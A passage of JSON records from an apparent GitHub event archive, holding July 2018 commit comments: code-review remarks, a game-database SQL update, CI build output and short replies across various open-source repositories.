[dev](https://console.bluemix.net/apps/020f34fd-2328-4120-95c2-fbcdc1d6a009?env_id=ibm:yp:us-south \"STAGING\"), including this commit"}},"created_at":"2018-07-09T14:22:36Z"}
{"id":"7937964915","type":"CommitCommentEvent","actor":{"login":"qxpf666"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29642600,"position":null,"line":null,"path":null,"commit_id":"64052172f4044eb6d4320bd72fe7d23f30e3620f","created_at":"2018-07-09T14:23:23Z","updated_at":"2018-07-09T14:23:23Z","author_association":"NONE","body":" UPDATE `creature_equip_template` SET `ItemID1`='45123' WHERE  `CreatureID`=86087; "}},"created_at":"2018-07-09T14:23:23Z"}
{"id":"7937967323","type":"CommitCommentEvent","actor":{"login":"ianfab"},"repo":{"name":"ianfab/uci2wb"},"payload":{"comment":{"id":29642604,"position":null,"line":null,"path":null,"commit_id":"63c361dd1d84a6395836381739a66d06b77db901","created_at":"2018-07-09T14:23:45Z","updated_at":"2018-07-09T14:23:45Z","author_association":"OWNER","body":"@HGMuller Thanks for the detailed answer. I am very open for a more UCI-style solution, like the one you suggested. I just took this simple approach to be able to quickly do some testing. The hack to be able to generally send xboard commands might also be an option, e.g., for additional rule definitions.\r\n\r\nThe command buffer size is the more urgent issue, since a too long list of variants in the UCI_Variant option currently results in no variants at all (apart from normal and fischerrandom) in the output of the adapter, whereas the setup of non-standard boards only affects a few variants."}},"created_at":"2018-07-09T14:23:45Z"}
{"id":"7937998701","type":"CommitCommentEvent","actor":{"login":"sandycis"},"repo":{"name":"sandycis/sandeepgliders"},"payload":{"comment":{"id":29642709,"position":null,"line":null,"path":null,"commit_id":"1462e0237ef1f5d6476d3bc8348ca359a9424591","created_at":"2018-07-09T14:28:39Z","updated_at":"2018-07-09T14:28:39Z","author_association":"OWNER","body":"developer is modifying the code "}},"created_at":"2018-07-09T14:28:39Z"}
{"id":"7937999375","type":"CommitCommentEvent","actor":{"login":"ImenBenA"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29642710,"position":78,"line":91,"path":"src/index.js","commit_id":"b6e9750b543063ddaebc9af55d873d22348bfe26","created_at":"2018-07-09T14:28:46Z","updated_at":"2018-07-09T14:28:46Z","author_association":"OWNER","body":"👍 "}},"created_at":"2018-07-09T14:28:46Z"}
{"id":"7938000197","type":"CommitCommentEvent","actor":{"login":"cyb3rist"},"repo":{"name":"cyb3rist/Updatix"},"payload":{"comment":{"id":29642712,"position":null,"line":null,"path":null,"commit_id":"7b5781dc18f7636b8a835ef45d1f0cc536004902","created_at":"2018-07-09T14:28:54Z","updated_at":"2018-07-09T14:28:54Z","author_association":"OWNER","body":"SiliguriCircle.com"}},"created_at":"2018-07-09T14:28:54Z"}
{"id":"7938000742","type":"CommitCommentEvent","actor":{"login":"jens1o"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":29642714,"position":36,"line":36,"path":"wcfsetup/install/files/lib/system/box/ProfileCommentListBoxController.class.php","commit_id":"e4fc3fe47fc6dd6d4fc93f25c2eabb5deff7c1fd","created_at":"2018-07-09T14:28:59Z","updated_at":"2018-07-09T14:28:59Z","author_association":"CONTRIBUTOR","body":"Could you add a box option to show only comments made by followers?"}},"created_at":"2018-07-09T14:28:59Z"}
{"id":"7938003819","type":"CommitCommentEvent","actor":{"login":"cyb3rist"},"repo":{"name":"cyb3rist/Updatix"},"payload":{"comment":{"id":29642720,"position":null,"line":null,"path":null,"commit_id":"7b5781dc18f7636b8a835ef45d1f0cc536004902","created_at":"2018-07-09T14:29:28Z","updated_at":"2018-07-09T14:29:28Z","author_association":"OWNER","body":"StartupSiliguri.com"}},"created_at":"2018-07-09T14:29:28Z"}
{"id":"7938006267","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29642723,"position":55,"line":88,"path":"addons/web/static/src/js/views/basic/basic_controller.js","commit_id":"4eafe7027129c32d239813672beecc8aa934aee4","created_at":"2018-07-09T14:29:51Z","updated_at":"2018-07-09T14:29:51Z","author_association":"NONE","body":"as i said elsewhere, i think that the controller should return an object with an optional css key, which contains a list of urls, so we do not need to do this"}},"created_at":"2018-07-09T14:29:51Z"}
{"id":"7938009825","type":"CommitCommentEvent","actor":{"login":"josefs"},"repo":{"name":"josefs/Gradualizer"},"payload":{"comment":{"id":29642733,"position":null,"line":null,"path":null,"commit_id":"a1093d7afc1dd5b05b900b2d27a264a710c8c967","created_at":"2018-07-09T14:30:25Z","updated_at":"2018-07-09T14:30:25Z","author_association":"OWNER","body":"@gomoripeti Yes, the constraint does express an intersection type. Though, I don't think that will help us when trying to typecheck a function which has a type which is an intersection type. We'd like to push the type information inwards into the function and just having a type variable as the `ResTy` in `type_check_expr_in` will not be very helpful. At least not the way it's implemented now.\r\n\r\nI don't yet have any final solutions to the problem of intersection types, but here are a few thoughts:\r\n\r\n- When typechecking a function with an intersection type, we can simply typecheck it multiple times, once for each type in the intersection type. This is a very simple solution that I think will work well in practice. But it makes other things a little problematic. If we wanted to add some kind of exhaustiveness check on pattern matching in the future, it would be hard to support intersection types with this solution.\r\n- When typechecking a call to a function with an intersection type, we would opt for choosing just one of the types, the first one which matches the types of the arguments. This is a bit limited, but at least cheap and easy to implement. It's not clear to me how well it would work in practice though. A full solution would probably require adding intersection types to the type language, as you suggest @zuiderkwast ."}},"created_at":"2018-07-09T14:30:25Z"}
{"id":"7938010416","type":"CommitCommentEvent","actor":{"login":"SanjitKal"},"repo":{"name":"disco-lang/disco"},"payload":{"comment":{"id":29642734,"position":null,"line":null,"path":null,"commit_id":"ce3bb118f49ba3e9584fc4ff9b58b5d42ef9b766","created_at":"2018-07-09T14:30:30Z","updated_at":"2018-07-09T14:30:30Z","author_association":"COLLABORATOR","body":"How can I see the updated version of readthedocs.io to make sure my stuff is displaying properly?"}},"created_at":"2018-07-09T14:30:30Z"}
{"id":"7938012107","type":"CommitCommentEvent","actor":{"login":"kdudka"},"repo":{"name":"fedora-sysv/initscripts"},"payload":{"comment":{"id":29642741,"position":16,"line":9,"path":"etc/profile.d/lang.csh","commit_id":"59928ce72da10f1c45a0aa08c9dd3a439fdd74a0","created_at":"2018-07-09T14:30:45Z","updated_at":"2018-07-09T14:30:45Z","author_association":"NONE","body":"`s/file/config/`  See https://bugzilla.redhat.com/1598268#c2."}},"created_at":"2018-07-09T14:30:45Z"}
{"id":"7938012122","type":"CommitCommentEvent","actor":{"login":"karoka"},"repo":{"name":"karoka/Phys514_HW2"},"payload":{"comment":{"id":29642742,"position":null,"line":null,"path":null,"commit_id":"0140be2c97d9fe07f1eeafe8380dfe5dc7c97e5c","created_at":"2018-07-09T14:30:46Z","updated_at":"2018-07-09T14:30:46Z","author_association":"OWNER","body":"@ikzk 。。你这都能找到我"}},"created_at":"2018-07-09T14:30:46Z"}
{"id":"7938014028","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29642747,"position":81,"line":246,"path":"addons/web/static/src/js/views/basic/basic_controller.js","commit_id":"4eafe7027129c32d239813672beecc8aa934aee4","created_at":"2018-07-09T14:31:03Z","updated_at":"2018-07-09T14:31:03Z","author_association":"NONE","body":"if you had the renderBanner in the _update method, this should not be necessary"}},"created_at":"2018-07-09T14:31:03Z"}
{"id":"7938017970","type":"CommitCommentEvent","actor":{"login":"muhrik"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29642760,"position":null,"line":null,"path":null,"commit_id":"f56a094b3b3b82f2ea9e264d050c524937a01f5d","created_at":"2018-07-09T14:31:41Z","updated_at":"2018-07-09T14:31:41Z","author_association":"COLLABORATOR","body":"@thomasmari \r\n![firstrejuvenation](https://user-images.githubusercontent.com/32157431/42455848-9dfea3aa-8393-11e8-9962-23346dbdb5cd.png)\r\nAre you talking about TrejWithReset and TrejWithoutReset?\r\n\r\nIn Oris, TrejWithReset happens only when the system is degraded. When it happens, the system goes from being \"Degraded\" to \"Up\". In other words, the restart happens when it should, and the system rejuvenates.\r\n\r\nTrejWithoutReset happens only when the system is \"Up\". When it happens, the system just stays \"Up\" without change. In other words, the restart happens when it shouldn't, needlessly, wastefully.\r\n\r\nThink about this.\r\nThis behavior is already included in an equivalent way within the fdPRISM model.\r\n`[rejuvenate] (maintenance=1) --rejuvenationTime-> (maintenance'=0) & (avail'=1) & (status'=0);`\r\nThe only prerequisite for [rejuvenate] is maintenance = 1.\r\nWhen you are doing [rejuvenate], the status may either be 0 or 1. \r\nIf it is 0 \"Up\", then \" (status'=0)\" does nothing (TrejWithoutReset).\r\nIf it is 1 \"Degraded\", then \" (status'=0)\" sets it to 0 \"Up\"  (TrejWithReset).\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-09T14:31:41Z"}
{"id":"7938020499","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29642763,"position":3,"line":3,"path":"addons/web/static/src/scss/banner.scss","commit_id":"4eafe7027129c32d239813672beecc8aa934aee4","created_at":"2018-07-09T14:32:06Z","updated_at":"2018-07-09T14:32:06Z","author_association":"NONE","body":"have you tested in community version? just to be sure the look is not messed up"}},"created_at":"2018-07-09T14:32:06Z"}
{"id":"7938024315","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29642779,"position":null,"line":null,"path":null,"commit_id":"563e77cae665a028e4e376b84b97867655dca257","created_at":"2018-07-09T14:32:40Z","updated_at":"2018-07-09T14:32:40Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-12](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-12).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-12-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-09T14:32:40Z"}
{"id":"7938038619","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29642810,"position":7,"line":411,"path":"addons/web/static/src/js/views/abstract_controller.js","commit_id":"4eafe7027129c32d239813672beecc8aa934aee4","created_at":"2018-07-09T14:34:57Z","updated_at":"2018-07-09T14:34:57Z","author_association":"NONE","body":"missing test for action manager change!"}},"created_at":"2018-07-09T14:34:57Z"}
{"id":"7938045051","type":"CommitCommentEvent","actor":{"login":"ImenBenA"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29642816,"position":13,"line":24,"path":"src/index.js","commit_id":"633b2a81d0105585de2c5371e3a0eeb6ea329fbe","created_at":"2018-07-09T14:36:00Z","updated_at":"2018-07-09T14:36:00Z","author_association":"OWNER","body":"I don't get it, why?"}},"created_at":"2018-07-09T14:36:00Z"}
{"id":"7938051093","type":"CommitCommentEvent","actor":{"login":"phhusson"},"repo":{"name":"phhusson/vendor_hardware_overlay"},"payload":{"comment":{"id":29642823,"position":null,"line":null,"path":null,"commit_id":"da882b424af5ccabf6d7a5808d2ed5336ee2d078","created_at":"2018-07-09T14:36:56Z","updated_at":"2018-07-09T14:36:56Z","author_association":"OWNER","body":"Thanks"}},"created_at":"2018-07-09T14:36:56Z"}
{"id":"7938052255","type":"CommitCommentEvent","actor":{"login":"mpericay"},"repo":{"name":"mpericay/tm3"},"payload":{"comment":{"id":29642827,"position":null,"line":null,"path":null,"commit_id":"a71ca8f8874ea7a30a58faaff0023decfa8ba991","created_at":"2018-07-09T14:37:08Z","updated_at":"2018-07-09T14:37:08Z","author_association":"OWNER","body":"Closes #139 "}},"created_at":"2018-07-09T14:37:08Z"}
{"id":"7938058822","type":"CommitCommentEvent","actor":{"login":"grrrian"},"repo":{"name":"GCRC/nunaliit_android"},"payload":{"comment":{"id":29642839,"position":301,"line":478,"path":"app/src/main/java/ca/carleton/gcrc/n2android_mobile1/connection/ConnectionSyncProcess.java","commit_id":"be3ef4e79ff954c1d207785b4650222f679af784","created_at":"2018-07-09T14:38:10Z","updated_at":"2018-07-09T14:38:10Z","author_association":"COLLABORATOR","body":"If an entry does not have a `docId`, this entire function throws; perhaps it is safer to catch and ignore those (unless we know `docId` always exists)."}},"created_at":"2018-07-09T14:38:10Z"}
{"id":"7938061104","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29642841,"position":29,"line":431,"path":"addons/web/static/src/js/views/abstract_controller.js","commit_id":"4eafe7027129c32d239813672beecc8aa934aee4","created_at":"2018-07-09T14:38:31Z","updated_at":"2018-07-09T14:38:31Z","author_association":"NONE","body":"what if this rpc takes a long time? For example, a few seconds, and the user clicked somewhere else in the meantime?  Suddenly the action returned will be executed and cancel the last action from the user.\r\n\r\nI think you should do this: \r\n\r\n```\r\nthis.dp.add(this._rpc({\r\n  ...\r\n})).then(function (action) {\r\n...\r\n});\r\n```"}},"created_at":"2018-07-09T14:38:31Z"}
{"id":"7938064541","type":"CommitCommentEvent","actor":{"login":"eladrkatz"},"repo":{"name":"jesstelford/aframe-click-drag-component"},"payload":{"comment":{"id":29642847,"position":119,"line":119,"path":"src/index.js","commit_id":"f446d1bb11931c1582b2d21b84311b72b618f3e2","created_at":"2018-07-09T14:39:03Z","updated_at":"2018-07-09T14:39:03Z","author_association":"NONE","body":"@ngokevin @jesstelford which bug are you referring to? Is it fixed? "}},"created_at":"2018-07-09T14:39:03Z"}
{"id":"7938067480","type":"CommitCommentEvent","actor":{"login":"dtdesign"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":29642856,"position":62,"line":62,"path":"wcfsetup/install/files/lib/system/condition/UserUserIDCondition.class.php","commit_id":"ea1d1e7613cf0a937370ae19b3f3ad2cecd6537b","created_at":"2018-07-09T14:39:32Z","updated_at":"2018-07-09T14:39:32Z","author_association":"MEMBER","body":"Using `min` would no longer allow the field to be left empty across all browsers."}},"created_at":"2018-07-09T14:39:32Z"}
{"id":"7938067665","type":"CommitCommentEvent","actor":{"login":"UXabre"},"repo":{"name":"theforeman/foreman"},"payload":{"comment":{"id":29642858,"position":22,"line":181,"path":"app/models/subnet.rb","commit_id":"009e7bbd29f31c3750a8be47b4aecf5278c0db95","created_at":"2018-07-09T14:39:34Z","updated_at":"2018-07-09T14:39:34Z","author_association":"NONE","body":"ProxyAPI::Template.new is actually instantiated twice, once here (which seems okay, since it's in line with the other modules). And once in foreman_url_rendered.rb. This causes \"/unattented\" to be appended twice, causing a 404 on the proxy side, resulting in a fallback to https for the template retrieval; which, for kickstart, at least generates issues with self-signed certificates."}},"created_at":"2018-07-09T14:39:34Z"}
{"id":"7938071876","type":"CommitCommentEvent","actor":{"login":"attackjom"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29642871,"position":null,"line":null,"path":null,"commit_id":"fdd247562257c90a997bde1f618e60f21651d317","created_at":"2018-07-09T14:40:16Z","updated_at":"2018-07-09T14:40:16Z","author_association":"NONE","body":"it's still not working on specific monsterID , test on Crab card"}},"created_at":"2018-07-09T14:40:16Z"}
{"id":"7938072664","type":"CommitCommentEvent","actor":{"login":"victortodoran"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":29642875,"position":null,"line":null,"path":null,"commit_id":"2db5aa15722307fb6ad703627933224f5f74bbe3","created_at":"2018-07-09T14:40:22Z","updated_at":"2018-07-09T14:40:22Z","author_association":"NONE","body":"This is happening in 2.2.2"}},"created_at":"2018-07-09T14:40:22Z"}
{"id":"7938075001","type":"CommitCommentEvent","actor":{"login":"Jan1503"},"repo":{"name":"neutmute/ConfigurationSectionDesigner"},"payload":{"comment":{"id":29642880,"position":null,"line":null,"path":null,"commit_id":"c24394c3596ecd3bd0fa5b36812756c5693d8a3d","created_at":"2018-07-09T14:40:44Z","updated_at":"2018-07-09T14:40:44Z","author_association":"NONE","body":"Hi there,\r\nwould you please submit a compiled VSIX for VS2015?\r\nI can't get it to work by building from source :("}},"created_at":"2018-07-09T14:40:44Z"}
{"id":"7938082320","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29642893,"position":18,"line":68,"path":"src/index.js","commit_id":"eb5546be71d855155744ecd46a85aa61608da767","created_at":"2018-07-09T14:41:53Z","updated_at":"2018-07-09T14:41:53Z","author_association":"COLLABORATOR","body":"The whole function"}},"created_at":"2018-07-09T14:41:53Z"}
{"id":"7938086544","type":"CommitCommentEvent","actor":{"login":"BertrandCaron"},"repo":{"name":"BertrandCaron/revise-premis-owl"},"payload":{"comment":{"id":29642900,"position":null,"line":null,"path":null,"commit_id":"fbae9561f0d1fc0aaf5ffb847df87345b650ad3f","created_at":"2018-07-09T14:42:32Z","updated_at":"2018-07-09T14:42:32Z","author_association":"OWNER","body":"See issue https://github.com/PREMIS-OWL-Revision-Team/revise-premis-owl/issues/46"}},"created_at":"2018-07-09T14:42:32Z"}
{"id":"7938093972","type":"CommitCommentEvent","actor":{"login":"BertrandCaron"},"repo":{"name":"BertrandCaron/revise-premis-owl"},"payload":{"comment":{"id":29642912,"position":null,"line":null,"path":null,"commit_id":"3474b06140c6213f0976c4337f27842271c4b8ef","created_at":"2018-07-09T14:43:40Z","updated_at":"2018-07-09T14:43:40Z","author_association":"OWNER","body":"See https://github.com/PREMIS-OWL-Revision-Team/revise-premis-owl/issues/45"}},"created_at":"2018-07-09T14:43:40Z"}
{"id":"7938098987","type":"CommitCommentEvent","actor":{"login":"stevectorbot"},"repo":{"name":"stevector/nerdologues-d8"},"payload":{"comment":{"id":29642919,"position":null,"line":null,"path":null,"commit_id":"20f2b4f9911abae2f0578152d7838f8e1b9ee777","created_at":"2018-07-09T14:44:27Z","updated_at":"2018-07-09T14:44:27Z","author_association":"NONE","body":"### Visual regression report:\n\n[![Visual report](https://circleci.com/gh/stevector/nerdologues-d8/1889/artifacts/0/artifacts/backstop_data/bitmaps_test/20180709-144333/failed_diff_0600294051_podcasts_0_document_0_desktop.png)](https://circleci.com/gh/stevector/nerdologues-d8/1889/artifacts/0/artifacts/backstop_data/html_report/index.html)"}},"created_at":"2018-07-09T14:44:27Z"}
{"id":"7938100849","type":"CommitCommentEvent","actor":{"login":"BertrandCaron"},"repo":{"name":"BertrandCaron/revise-premis-owl"},"payload":{"comment":{"id":29642925,"position":null,"line":null,"path":null,"commit_id":"565b7103fa0ddea1bbcfa8449dd2f62c112883d7","created_at":"2018-07-09T14:44:44Z","updated_at":"2018-07-09T14:44:44Z","author_association":"OWNER","body":"See https://github.com/PREMIS-OWL-Revision-Team/revise-premis-owl/issues/45"}},"created_at":"2018-07-09T14:44:44Z"}
{"id":"7938103976","type":"CommitCommentEvent","actor":{"login":"jimwwalker"},"repo":{"name":"jimwwalker/kv_engine"},"payload":{"comment":{"id":29642932,"position":8,"line":347,"path":"daemon/connection.h","commit_id":"3acf41259f4af9fcbc4c92c8bbdf5ca5274f9b40","created_at":"2018-07-09T14:45:14Z","updated_at":"2018-07-09T14:45:14Z","author_association":"OWNER","body":"sort this"}},"created_at":"2018-07-09T14:45:14Z"}
{"id":"7938105386","type":"CommitCommentEvent","actor":{"login":"jimwwalker"},"repo":{"name":"jimwwalker/kv_engine"},"payload":{"comment":{"id":29642938,"position":15,"line":353,"path":"daemon/connection.h","commit_id":"3acf41259f4af9fcbc4c92c8bbdf5ca5274f9b40","created_at":"2018-07-09T14:45:25Z","updated_at":"2018-07-09T14:45:25Z","author_association":"OWNER","body":"use sizeof"}},"created_at":"2018-07-09T14:45:25Z"}
{"id":"7938107201","type":"CommitCommentEvent","actor":{"login":"jimwwalker"},"repo":{"name":"jimwwalker/kv_engine"},"payload":{"comment":{"id":29642940,"position":26,"line":491,"path":"daemon/connection.h","commit_id":"3acf41259f4af9fcbc4c92c8bbdf5ca5274f9b40","created_at":"2018-07-09T14:45:41Z","updated_at":"2018-07-09T14:45:41Z","author_association":"OWNER","body":"update comment and reference my MB"}},"created_at":"2018-07-09T14:45:41Z"}
{"id":"7938108692","type":"CommitCommentEvent","actor":{"login":"jimwwalker"},"repo":{"name":"jimwwalker/kv_engine"},"payload":{"comment":{"id":29642944,"position":15,"line":41,"path":"daemon/protocol/mcbp/dcp_mutation.cc","commit_id":"3acf41259f4af9fcbc4c92c8bbdf5ca5274f9b40","created_at":"2018-07-09T14:45:55Z","updated_at":"2018-07-09T14:45:55Z","author_association":"OWNER","body":"reference my MB"}},"created_at":"2018-07-09T14:45:55Z"}
{"id":"7938108814","type":"CommitCommentEvent","actor":{"login":"BertrandCaron"},"repo":{"name":"BertrandCaron/revise-premis-owl"},"payload":{"comment":{"id":29642945,"position":null,"line":null,"path":null,"commit_id":"837e3c7230b0fde58aff3d5f9b1092fed81e7ac7","created_at":"2018-07-09T14:45:56Z","updated_at":"2018-07-09T14:45:56Z","author_association":"OWNER","body":"See https://github.com/PREMIS-OWL-Revision-Team/revise-premis-owl/issues/58"}},"created_at":"2018-07-09T14:45:56Z"}
{"id":"7938109224","type":"CommitCommentEvent","actor":{"login":"alanmcgovern"},"repo":{"name":"ermau/Tempest"},"payload":{"comment":{"id":29642946,"position":5,"line":55,"path":"Tempest/MessageResponseManager.cs","commit_id":"74f195c4c8f08f9161475d2ae5500ad04079acf1","created_at":"2018-07-09T14:46:00Z","updated_at":"2018-07-09T14:46:00Z","author_association":"NONE","body":"Or just `DateTime.Now.AddMilliseconds`.\r\n\r\nWe should probably be using UtcNow as well if we want to avoid timezone related issues :)"}},"created_at":"2018-07-09T14:46:00Z"}
{"id":"7938110940","type":"CommitCommentEvent","actor":{"login":"moylop260"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29642953,"position":16,"line":595,"path":"addons/stock/models/product.py","commit_id":"d44a4df8638a3f627d15caa5793f72dc9c0a5cdc","created_at":"2018-07-09T14:46:15Z","updated_at":"2018-07-09T14:46:15Z","author_association":"CONTRIBUTOR","body":"@KangOl\r\nIf the first item return the expected value then it will searching for other values.\r\nWhat about uses  “u[f] in {‘factor’, ‘factor_inv’, ‘category_id’}”?"}},"created_at":"2018-07-09T14:46:15Z"}
{"id":"7938119838","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29642967,"position":13,"line":24,"path":"src/index.js","commit_id":"633b2a81d0105585de2c5371e3a0eeb6ea329fbe","created_at":"2018-07-09T14:47:39Z","updated_at":"2018-07-09T14:47:39Z","author_association":"COLLABORATOR","body":"First of all, it's very common (and has become a best practice) to use the destruction of the state and props even when you're using only one variable. And second, it makes your code cleaner. For instance, item will become\r\n`const item = {value, done : false, active: false};`. You will also have defined 2 variables in one line with little code (instead of a repetitive `let variableName = this.state.variableName`)."}},"created_at":"2018-07-09T14:47:39Z"}
{"id":"7938120266","type":"CommitCommentEvent","actor":{"login":"moylop260"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29642968,"position":19,"line":598,"path":"addons/stock/models/product.py","commit_id":"d44a4df8638a3f627d15caa5793f72dc9c0a5cdc","created_at":"2018-07-09T14:47:43Z","updated_at":"2018-07-09T14:47:43Z","author_association":"CONTRIBUTOR","body":"@KangOl \r\nIf you use the returned value like a boolean then you don’t need count all the records.\r\nWhat about uses “search(..., limit=1)” instead.\r\n\r\ncc @odony @mart-e "}},"created_at":"2018-07-09T14:47:43Z"}
{"id":"7938121105","type":"CommitCommentEvent","actor":{"login":"MarkTheFreak"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29642974,"position":null,"line":null,"path":null,"commit_id":"65a0e54555683026c9031bb72dc3b7a81b29f02a","created_at":"2018-07-09T14:47:52Z","updated_at":"2018-07-09T14:47:52Z","author_association":"NONE","body":"You should've kept the \"Don't drop it\" line"}},"created_at":"2018-07-09T14:47:52Z"}
{"id":"7938121787","type":"CommitCommentEvent","actor":{"login":"DyalogJenkins"},"repo":{"name":"Dyalog/MiServer"},"payload":{"comment":{"id":29642977,"position":null,"line":null,"path":null,"commit_id":"a8f1d4e02a2918cc7333f8aecbfc5eb146523c17","created_at":"2018-07-09T14:47:58Z","updated_at":"2018-07-09T14:47:58Z","author_association":"MEMBER","body":"Build failed with output:\n```SQA failed to initialize\n MiServer for \"/MiServer/MS3\" started on http://172.17.0.3:8080              \n Running in Production mode (configured by setting <Production> in /Config/Se\n                \n       rver.xml)\n \"HandleRequest\" closed socket SRV00000000.CON00000000 due to error: 1001  ER\n       R_LENGTH    sending response\n \"HandleRequest\" closed socket SRV00000000.CON00000001 due to error: 1001  ER\n       R_LENGTH    sending response\n \"HandleRequest\" closed socket SRV00000000.CON00000002 due to error: 1001  ER\n       R_LENGTH    sending response\n \"HandleRequest\" closed socket SRV00000000.CON00000003 due to error: 1001  ER\n       R_LENGTH    sending response\n \"HandleRequest\" closed socket SRV00000000.CON00000004 due to error: 1001  ER\n       R_LENGTH    sending response\n \"HandleRequest\" closed socket SRV00000000.CON00000005 due to error: 1001  ER\n       R_LENGTH    sending response\n```"}},"created_at":"2018-07-09T14:47:58Z"}
{"id":"7938129256","type":"CommitCommentEvent","actor":{"login":"JarekParal"},"repo":{"name":"RoboticsBrno/RoboticsBrno-guides"},"payload":{"comment":{"id":29642994,"position":30,"line":249,"path":"RoboticsManual/software.tex","commit_id":"53cbea5cb9b8b926f25dfe0e7b915f499efbb124","created_at":"2018-07-09T14:49:06Z","updated_at":"2018-07-09T14:49:06Z","author_association":"MEMBER","body":"@MiroslavBurda \r\nPozor, příkaz `\\uv` udělá české uvozovky (https://roboticsbrno.github.io/RoboticsBrno-guides/#x1-1130004.4), ale git potřebuje klasické anglické `\"`."}},"created_at":"2018-07-09T14:49:06Z"}
{"id":"7938131385","type":"CommitCommentEvent","actor":{"login":"moylop260"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29643000,"position":9,"line":89,"path":"addons/stock/models/stock_location.py","commit_id":"d44a4df8638a3f627d15caa5793f72dc9c0a5cdc","created_at":"2018-07-09T14:49:24Z","updated_at":"2018-07-09T14:49:24Z","author_association":"CONTRIBUTOR","body":"Same case here\r\n"}},"created_at":"2018-07-09T14:49:24Z"}
{"id":"7938132112","type":"CommitCommentEvent","actor":{"login":"SibrenVasse"},"repo":{"name":"openwrt/luci"},"payload":{"comment":{"id":29643001,"position":4,"line":4,"path":"modules/luci-base/luasrc/view/cbi/header.htm","commit_id":"c0de036b3162d73e9fad878afaa32e7ca0df1fed","created_at":"2018-07-09T14:49:31Z","updated_at":"2018-07-09T14:49:31Z","author_association":"NONE","body":"This now displays plaintext javascript."}},"created_at":"2018-07-09T14:49:31Z"}
{"id":"7938144070","type":"CommitCommentEvent","actor":{"login":"moylop260"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29643021,"position":null,"line":null,"path":null,"commit_id":"d44a4df8638a3f627d15caa5793f72dc9c0a5cdc","created_at":"2018-07-09T14:51:16Z","updated_at":"2018-07-09T14:51:16Z","author_association":"CONTRIBUTOR","body":"This commit insert big performance issue. See my comments above\r\nExample\r\nhttps://github.com/odoo/odoo/pull/25673#issuecomment-403431948\r\n"}},"created_at":"2018-07-09T14:51:16Z"}
{"id":"7938149283","type":"CommitCommentEvent","actor":{"login":"eladrkatz"},"repo":{"name":"jesstelford/aframe-click-drag-component"},"payload":{"comment":{"id":29643028,"position":null,"line":null,"path":null,"commit_id":"f446d1bb11931c1582b2d21b84311b72b618f3e2","created_at":"2018-07-09T14:52:03Z","updated_at":"2018-07-09T14:52:03Z","author_association":"NONE","body":"@ngokevin @jesstelford in line 119 you're referring to a bug - which bug are you referring to? Is it fixed? can I use the regular threejs code?"}},"created_at":"2018-07-09T14:52:03Z"}
{"id":"7938157914","type":"CommitCommentEvent","actor":{"login":"yadaojianpan"},"repo":{"name":"yadaojianpan/yadaojianpan.github.io"},"payload":{"comment":{"id":29643046,"position":null,"line":null,"path":null,"commit_id":"12beffc192e54dafd36add455861b86f74920134","created_at":"2018-07-09T14:53:24Z","updated_at":"2018-07-09T14:53:24Z","author_association":"OWNER","body":"![511k](https://user-images.githubusercontent.com/26535967/42457724-d1209fcc-83ca-11e8-8bc4-bc0d9cfea40d.jpg)\r\n"}},"created_at":"2018-07-09T14:53:24Z"}
{"id":"7938158019","type":"CommitCommentEvent","actor":{"login":"jmarsac"},"repo":{"name":"OSGeo-fr/QGIS-conf-fr-website"},"payload":{"comment":{"id":29643047,"position":null,"line":null,"path":null,"commit_id":"d1d551e8cade52e96ec2e84ccee7de11830b332e","created_at":"2018-07-09T14:53:24Z","updated_at":"2018-07-09T14:53:24Z","author_association":"COLLABORATOR","body":"![logosupagroosgeo-300x50](https://user-images.githubusercontent.com/1390831/42457643-459fb8a2-8398-11e8-9379-40b1d9db3834.png)\r\n\r\n"}},"created_at":"2018-07-09T14:53:24Z"}
{"id":"7938159354","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29643050,"position":14,"line":13,"path":"src/main/java/com/agurova/services/impl/UnsplashStockImagesService.java","commit_id":"73ca78bf5e0eb188612a5f21252a61e92576ba85","created_at":"2018-07-09T14:53:37Z","updated_at":"2018-07-09T14:53:37Z","author_association":"COLLABORATOR","body":"Переименовать переменную в соответствии с общепринятыми правилами наименования в Java."}},"created_at":"2018-07-09T14:53:37Z"}
